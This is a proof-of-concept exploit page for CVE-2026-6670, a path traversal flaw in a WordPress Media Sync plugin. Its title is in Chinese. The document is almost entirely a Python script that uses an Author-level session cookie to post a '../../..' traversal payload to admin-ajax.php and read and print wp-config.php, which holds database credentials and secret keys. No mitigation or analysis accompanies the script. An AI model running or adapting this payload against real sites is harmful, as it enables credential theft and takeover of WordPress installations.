CVE-2026-6670 WordPress Media Sync插件路径遍历漏洞

# Proof of Concept for CVE-2026-6670 # This script demonstrates the Path Traversal vulnerability. # Requires Author-level privileges or higher. import requests target_url = "http://example.com/wp-admin/admin-ajax.php" # Attacker's cookies (authenticated session) cookies = { "wordpress_logged_in_xxx": "your_cookie_value" } # The vulnerable payload using directory traversal sequences # Attempting to read wp-config.php payload_data = { "action": "media_sync_action", "sub_dir": "../../..", "media_items": "wp-config.php" } try: response = requests.post(target_url, data=payload_data, cookies=cookies) if response.status_code == 200: print("[+] Request sent successfully.") print("[+] Response content:") print(response.text) else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}")